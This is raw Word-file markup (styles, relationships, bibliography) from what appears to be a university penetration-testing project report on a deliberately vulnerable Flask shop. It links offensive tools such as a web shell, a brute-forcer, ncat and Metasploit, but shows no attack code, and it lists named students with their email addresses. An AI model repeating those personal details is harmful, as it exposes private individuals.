    <w:rsid w:val="00636565"/>
    <w:rsid w:val="00641917"/>
    <w:rsid w:val="00641976"/>
    <w:rsid w:val="00643C5A"/>
    <w:rsid w:val="00662B3D"/>
    <w:rsid w:val="006B7F40"/>
    <w:rsid w:val="006C4E45"/>
    <w:rsid w:val="007553D4"/>
    <w:rsid w:val="007B216A"/>
    <w:rsid w:val="008209A8"/>
    <w:rsid w:val="008349E4"/>
    <w:rsid w:val="0083712C"/>
    <w:rsid w:val="00846707"/>
    <w:rsid w:val="00910C41"/>
    <w:rsid w:val="00915BC5"/>
    <w:rsid w:val="0094772C"/>
    <w:rsid w:val="00987876"/>
    <w:rsid w:val="009B33BE"/>
    <w:rsid w:val="009B40A5"/>
    <w:rsid w:val="009D078A"/>
    <w:rsid w:val="009E0EFC"/>
    <w:rsid w:val="00A00F5A"/>
    <w:rsid w:val="00A40517"/>
    <w:rsid w:val="00A44559"/>
    <w:rsid w:val="00A861C7"/>
    <w:rsid w:val="00AB479F"/>
    <w:rsid w:val="00AC5263"/>
    <w:rsid w:val="00B265CD"/>
    <w:rsid w:val="00B56C0A"/>
    <w:rsid w:val="00B90A7E"/>
    <w:rsid w:val="00BC0215"/>
    <w:rsid w:val="00C04030"/>
    <w:rsid w:val="00C31234"/>
    <w:rsid w:val="00C84C06"/>
    <w:rsid w:val="00CA3121"/>
    <w:rsid w:val="00D25AB7"/>
    <w:rsid w:val="00D57AD9"/>
    <w:rsid w:val="00DF7185"/>
    <w:rsid w:val="00E01B85"/>
    <w:rsid w:val="00E55B6A"/>
    <w:rsid w:val="00E9393E"/>
    <w:rsid w:val="00EA351B"/>
    <w:rsid w:val="00ED2CB6"/>
    <w:rsid w:val="00ED3AFE"/>
    <w:rsid w:val="00EE18F4"/>
    <w:rsid w:val="00F13709"/>
    <w:rsid w:val="00F22AF0"/>
    <w:rsid w:val="00F25059"/>
    <w:rsid w:val="00F75888"/>
    <w:rsid w:val="00FC43A5"/>
    <w:rsid w:val="00FF5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E047"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{66E424A5-6965-46AB-A60C-E6958594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2B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2B3D"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00ED3AFE"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00ED3AFE"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C31234"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00B90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5B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508">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="114760368">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="117140819">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="192839627">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="296956437">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="312803964">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="473258275">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="511261931">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="661663067">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="673843684">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="777876269">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="938758796">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="970675599">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1201743868">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1391421416">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1618484424">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="176522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11.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cryptokait.com/2020/03/04/a-beginners-guide-to-scanning-with-dirbuster-for-the-ncl-games/" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.png"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://old-releases.ubuntu.com/releases/18.10/ubuntu-18.10-desktop-amd64.iso" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject4.bin"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId128"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https://github.com/Greatest125/Hatch-Python3" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:bob@projex.com" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.jpeg"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.org/tools/weevely/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId17"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oleObject" Target="embeddings/oleObject6.bin"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.softwaretestinghelp.com/cross-site-scripting-xss-attack-test/" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.png"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/ncat/" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.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01.png"/><Relationship Id="rId145"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3.bin"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pfsense.org/download/" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/18596411/skip-login-page-if-session-exists" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject8.bin"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.metasploit.com/" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.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image" Target="media/image81.jpeg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject5.bin"/><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png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nu11secur1ty.com/2015/11/dvwa-brute-force-high-level-anti-csrf.html" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.png"/><Relationship Id="rId14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53.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3.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject7.bin"/><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3.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.jpeg"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.jpeg"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject2.bin"/><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7.png"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId14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hyperlink" Target="mailto:bob@projex.com" TargetMode="External"/><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86.png"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kali.download/virtual-images/kali-2022.1/kali-linux-2022.1-vmware-amd64.7z" TargetMode="External"/><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hyperlink" Target="https://github.com/Greatest125/Hatch-Python3" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.jpeg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><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hyperlink" Target="https://nmap.org/zenmap/" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.turbo.net/run/apache/apache-2.4.34" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.imperva.com/learn/application-security/brute-force-attack/" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><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78.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.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hyperlink" Target="mailto:email='bob@projex.com" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload" TargetMode="Externa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hyperlink" Target="https://medium.com/swlh/hacking-flask-applications-939eae4bffed" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bugtijamal/flaskecommerce" TargetMode="External"/><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0.emf"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/daviddias/node-dirbuster/blob/master/lists/directory-list-2.3-small.txt" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/5207160/what-is-a-csrf-token-what-is-its-importance-and-how-does-it-work" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.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58.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://semgrep.dev/docs/cheat-sheets/flask-xss/" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.png"/><Relationship Id="rId144"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STAKEHOLDERS
Sponsor: Robert Ludwiniak r.ludwiniak@napier.ac.uk
Project Manager: David Black  40457734@live.napier.ac.uk
Consultant: Tim Drummond 40479269@live.napier.ac.uk 
Consultant: Ada Wells 40444633@live.napier.ac.uk
Consultant: Pawel Wilkowski 40537959@live.napier.ac.uk
Consultant: Dan Anderson 40410538@live.napier.ac.uk
Consultant: Marco Giancola 40428070@live.napier.ac.u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WA22</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{BCE19861-F914-4333-8D08-96C873D92989}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>OWASP</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Unrestricted file upload</b:Title>
    <b:InternetSiteTitle>owasp.org</b:InternetSiteTitle>
    <b:Year>2022</b:Year>
    <b:URL>https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload</b:URL>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>bug</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{4A013262-7AB8-4209-9348-5221F5F86A6F}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>bugtijamal</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>flaskecommerce</b:Title>
    <b:InternetSiteTitle>github.com</b:InternetSiteTitle>
    <b:URL>https://github.com/bugtijamal/flaskecommerce</b:URL>
    <b:Year>2020</b:Year>
    <b:RefOrder>3</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ubu</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{50375AB7-8EEC-4DFB-B84B-A8FC86A2AC54}</b:Guid>
    <b:Title>ubuntu-18.10-desktop-amd64.iso</b:Title>
    <b:InternetSiteTitle>old-releases.ubuntu.com</b:InternetSiteTitle>
    <b:URL>https://old-releases.ubuntu.com/releases/18.10/ubuntu-18.10-desktop-amd64.iso</b:URL>
    <b:RefOrder>4</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>kal21</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{C91C228C-CD55-4095-BB10-A56ACBC5B874}</b:Guid>
    <b:Title>kali-linux-2022.1-vmware-amd64.7z</b:Title>
    <b:InternetSiteTitle>kali.download</b:InternetSiteTitle>
    <b:Year>2021</b:Year>
    <b:URL>https://kali.download/virtual-images/kali-2022.1/kali-linux-2022.1-vmware-amd64.7z</b:URL>
    <b:RefOrder>5</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>fla</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{D6981B72-1090-4A0A-BFA7-7B9278E4759D}</b:Guid>
    <b:Title>flask-xss</b:Title>
    <b:InternetSiteTitle>semgrep.dev</b:InternetSiteTitle>
    <b:URL>https://semgrep.dev/docs/cheat-sheets/flask-xss/</b:URL>
    <b:Author>
      <b:Author>
        <b:Corporate>semgrep</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Year>2022</b:Year>
    <b:RefOrder>6</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>dow21</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{6E7141BF-E272-4E25-B8A9-B5BBB384BBC1}</b:Guid>
    <b:Title>download</b:Title>
    <b:InternetSiteTitle>www.pfsense.org</b:InternetSiteTitle>
    <b:Year>2021</b:Year>
    <b:URL>https://www.pfsense.org/download/</b:URL>
    <b:Author>
      <b:Author>
        <b:Corporate>pfsense</b:Corporate>
      </b:Author>
    </b:Author>
    <b:RefOrder>7</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>sof22</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{F2BD015D-EFFE-4330-A26B-E8193935CE3B}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>softwaretestinghelp</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>cross-site-scripting-xss-attack-test</b:Title>
    <b:InternetSiteTitle>www.softwaretestinghelp.com</b:InternetSiteTitle>
    <b:Year>2022</b:Year>
    <b:Month>03</b:Month>
    <b:Day>23</b:Day>
    <b:URL>https://www.softwaretestinghelp.com/cross-site-scripting-xss-attack-test/</b:URL>
    <b:RefOrder>8</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>hac</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{37DC858E-6AE3-4DFB-B3C6-A191CFF8C5A8}</b:Guid>
    <b:Title>hacking-flask-applications</b:Title>
    <b:InternetSiteTitle>medium.com</b:InternetSiteTitle>
    <b:URL>https://medium.com/swlh/hacking-flask-applications-939eae4bffed</b:URL>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Li</b:Last>
            <b:First>Vickie</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Year>2020</b:Year>
    <b:Month>02</b:Month>
    <b:Day>18</b:Day>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>nma22</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{3B418742-18C4-4117-BD2E-E76D027927FB}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>nmap</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>ncat</b:Title>
    <b:InternetSiteTitle>nmap.org</b:InternetSiteTitle>
    <b:Year>2022</b:Year>
    <b:URL>https://nmap.org/ncat/</b:URL>
    <b:RefOrder>9</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>rap22</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{0EC12AA5-A048-4E78-8BC6-262A670822E9}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>rapid7</b:Corporate>
      </b:Author>
    </b:Author>
    <b:InternetSiteTitle>www.metasploit.com</b:InternetSiteTitle>
    <b:Year>2022</b:Year>
    <b:URL>https://www.metasploit.com/</b:URL>
    <b:RefOrder>10</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>nma221</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{CB5750B1-3D8C-41CF-81B7-D2198D32BD11}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>nmap</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>nmap</b:Title>
    <b:InternetSiteTitle>nmap.org</b:InternetSiteTitle>
    <b:Year>2022</b:Year>
    <b:URL>https://nmap.org/</b:URL>
    <b:RefOrder>11</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>imp22</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{A6A5FD90-90A8-4491-800B-8AB4B1CDB6B8}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>imperva.</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>brute-force-attack</b:Title>
    <b:InternetSiteTitle>www.imperva.com</b:InternetSiteTitle>
    <b:Year>2022</b:Year>
    <b:URL>https://www.imperva.com/learn/application-security/brute-force-attack/</b:URL>
    <b:RefOrder>12</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Lut15</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{24BDC51C-C793-4365-B5A0-EDA976CF5258}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Prechelt</b:Last>
            <b:First>Lutz</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
